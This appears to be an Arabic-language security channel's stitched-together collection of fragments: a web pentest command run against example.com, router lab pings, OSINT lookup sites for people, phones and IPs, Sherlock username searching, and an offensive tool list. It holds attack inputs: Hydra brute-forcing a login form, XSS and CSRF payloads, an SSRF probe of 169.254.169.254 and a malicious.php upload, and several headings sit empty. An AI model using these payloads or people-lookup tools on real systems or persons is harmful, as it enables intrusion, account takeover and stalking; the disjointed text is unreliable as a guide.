Yemen Cybersecurity

HTTP vs HTTPS vs VPN

الخلاصة

# إنشاء مجلد للاختبار
mkdir security_testing && cd security_testing

# تثبيت الأدوات الأساسية (على Kali Linux أو نظام مشابه)
sudo apt update && sudo apt install -y zaproxy nikto sqlmap nmap wireshark

python3 sublist3r.py -d example.com -o subdomains.txt

nmap -sV -T4 -A -oN nmap_scan.txt example.com

whatweb example.com --color=never > whatweb.txt

testssl.sh example.com > ssl_report.txt

wireshark -k -i eth0 -Y "ssl.handshake" -w ssl_capture.pcap

zap.sh -cmd -quickurl https://example.com -quickout zap_report.xml

nikto -h https://example.com -output nikto_scan.html

python3 dirsearch.py -u https://api.example.com -e json -o api_endpoints.txt

# إنشاء مجموعة اختبار في Postman
# إرسال طلبات إلى:
GET https://api.example.com/v1/users
GET https://api.example.com/v1/users/123

# استخدام Hydra للاختبار القانوني (بإذن)
hydra -l admin -P passwords.txt example.com http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect"

# تعديل ملفات تعريف الارتباط باستخدام Cookie-Editor
# اختبار Session Fixation:
1. الحصول على sessionid
2. إجبار المستخدم على استخدام نفس sessionid
3. التحقق من الوصول

sqlmap -u "https://example.com/products?id=1" --risk=1 --level=1 --batch --output-dir=sqlmap_report

# اختبار Stored XSS
curl -X POST -d "comment=<script>alert('XSS')</script>" https://example.com/comments

# اختبار Reflected XSS
curl "https://example.com/search?q=<script>alert('XSS')</script>"

# إنشاء نموذج HTML مزيف
echo '<form action="https://example.com/change-password" method="POST">
  <input type="hidden" name="new_password" value="hacked">
</form>' > csrf_test.html

curl -H "Authorization: Bearer USER_TOKEN" https://example.com/api/users/12345

# محاولة الوصول لوظائف إدارية
curl -H "Authorization: Bearer USER_TOKEN" https://example.com/admin/dashboard

# اختبار طلبات داخلية
curl "https://example.com/fetch?url=http://169.254.169.254/latest/meta-data"

# محاولة رفع ملف خبيث
curl -X POST -F "file=@malicious.php" https://example.com/upload

cat *.txt *.html *.xml > final_report.md

# استخدام معيار CVSS
echo "1. SQL Injection - CVSS:9.8" >> vulnerabilities_ranked.txt
echo "2. XSS - CVSS:6.1" >> vulnerabilities_ranked.txt

# استخدام نسخة محلية للاختبار
docker run --rm -it vulnerables/web-dvwa

sudo apt update && sudo apt upgrade -y

# تسجيل أوامر التاريخ
script -a testing_session.log

# حذف الحسابات الاختبارية
curl -X DELETE https://example.com/api/test-users

C:\> ping 192.168.2.10  # يجب أن يعمل (لاختبار الاتصال بين الشبكتين)

R1# ping 10.0.0.2       # لاختبار الاتصال مع R2
R1# ssh -l admin 10.0.0.2  # للاتصال بـ R2 عبر SSH

R2# ping 10.0.0.1       # لاختبار الاتصال مع R1
R2# ssh -l admin 10.0.0.1  # للاتصال بـ R1 عبر SSH

Username أو Alias Checkers – يفحصلك اذا الاسم مستخدم بمواقع مختلفة - http://namechk.com/ – يكلك الاسم موجود بأي موقع اجتماعي او دومين - http://knowem.com/ – نفس الشي يشيك على السوشال ميديا والدومينات - http://www.namecheckr.com/ – يبحث عن توافر الاسم على المنصات - http://checkusernames.com/ – يشوف وين الاسم مستخدم - http://usersherlock.com/ – يبحث عن اليوزر نيم على النت كله - https://www.usersearch.org/ – يطلعلك أماكن تواجد الاسم على الانترنت Archive Tools – أرشيف وحفظ نسخة من المواقع والصفحات القديمة - https://archive.org/index.php – أرشيف الانترنت تقدر تشوف نسخ قديمة من المواقع - https://www.archive-it.org/ – أرشيف خاص بالمنظمات والويب Social Networks و People Finders – البحث عن أشخاص ومواقعهم على السوشال ميديا - http://www.yasni.com/ – يطلعلك معلومات عن الأشخاص حسب الاسم - http://socialmention.com/ – يبحث عن اسمك او موضوع على السوشال ميديا - http://www.whostalkin.com/ – يشوف من يحچي عنك او موضوعك - http://www.linkedin.com/ – الشبكة المهنية للبحث عن أشخاص وشغلهم - http://www.formspring.me/ – أسئلة واجوبة عن الأشخاص (قديم) - http://foursquare.com/ – يبين أماكن تواجد الأشخاص - https://about.me/ – صفحة شخصية مختصرة لأي شخص - https://profiles.google.com/ – بروفايلات جوجل - http://blogger.com – مدونات الناس - https://twitter.com/ – تويتر - http://www.facebook.com/ – فيسبوك - https://deviantart.com – فنون وأعمال المستخدمين - http://xanga.com/ – مدونات قديمة - http://tumblr.com/ – مدونات وصور وفيديو - http://myspace.com/ – الشبكة القديمة للموسيقى - http://www.photobucket.com/ – صور المستخدمين - http://www.quora.com/ – أسئلة وأجوبة - http://www.stumbleupon.com/ – مواقع ومقالات الناس يشاركوها - http://www.reddit.com – منتديات ومجتمعات - http://www.digg.com – مشاركة الأخبار والمقالات - http://www.plixi.com – رفع ومشاركة الصور - http://pulse.yahoo.com/ – أخبار ومحتوى من ياهو - http://www.flickr.com/ – صور وفوتوغرافي Phone Number Lookup – يفحصلك أرقام الهاتف - http://www.numberway.com/ – معلومات عامة عن الرقم - http://www.fonefinder.net – يبينلك مكان الرقم وأحياناً مزود الخدمة IP Address Info – معلومات عن أي IP - http://www.infosniper.net/ – يبينلك مكان الIP - http://ip-lookup.net/ – معلومات عن الIP والمزود - http://whatstheirip.com – يعرض مكان الIP - http://getthierip.com – نفس الشي WHOIS / Website Recon – معلومات عن المواقع والدومينات - https://www.whois.net/ – بيانات الدومين ومالك الموقع - http://whois.icann.org/en – معلومات رسمية عن الدومين - https://who.is/ – بيانات الدومين - http://www.whois.com/whois – معلومات مفصلة عن الموقع - http://www.whois.com/ – نفس الشي - http://www.statsinfinity.com/ – تحليل المواقع والاحصائيات Image Lookup – البحث عن الصور ومصدرها - http://www.tineye.com/ – يبحثلك عن الصور وين موجودة على الانترنت - http://saucenao.com/ – يبحثلك عن الصور للأنمي والفنون - http://www.photobucket.com/ – صور المستخدمين - https://images.google.com/?gws_rd=ssl – بحث جوجل بالصور⁣

أداة قوية للمبرمجين وأمن المعلومات 🔥

cd sherlock

pip install -r requirements.txt

python sherlock username

طلبات واستجابات HTTP — ببساطة متى بتحصل؟

curl example.com -v # أو لمزيد من التفاصيل: curl example.com -vvv 

⚠️ ملاحظة أمان مهمة (HSTS)

✅ خلاصة سريعة (TL;DR):

سؤال سريع للمتابعين (Engage):

أمثلة على مشغّلات مفيدة

استخدام عملي مبسّط

مصادر مفيدة

🛡️ اهم ادوات الأمن السيبراني بحسب الفئة 🔥 .

1️⃣جمع المعلومات: Nmap Shodan Maltego TheHavester Recon-NG Amass Censys OSINT Framework Gobuster

2️⃣ الاستغلال: Burp Suite Metasploit Framework SQL Map ZAP ExploitDB Core Impact Cobalt Strike

3️⃣ تكسير كلمات المرور: John The Ripper Hydra Hashcat OPHCrack Medusa THC-Hydra Cain & Abel

4️⃣ مسح ثغرات الامنية: OpenVAS Nessus AppScan LYNIS Retina Nexpose

5️⃣ هندسة البرمجياة: GoPhish HiddenEye SocialFish EvilURL Evilginx

6️⃣ التحليل الجنائي: SluethKit Autopsy Volatility Guymager Foremost Binwalk Wireshark

7️⃣ القرصنة اللاسلكية: Aircrack-NG Wifite Kismet TCPDump Airsnort Netstumbler Reaver

8️⃣ تقييم حماية تطبيقات الويب: OWASP ZAP Burp Suite Nikto ZAP WPScan Gobuster App Spider

⁞ الاوامـــــــــــــــــــــــر :

$ apt update 

$ apt upgrade

$ pkg install git

$ git clone https://github.com/IVAN-DARK/IP-info

$ cd IP-info

$ bash install.sh

$ IP-info ( هنا تكتب الـ الايبي اللي تريد تفحصه)

⁞ و حتى تلغى تثبيت الاداة :

$ cd IP-info

$ bash uninstall.sh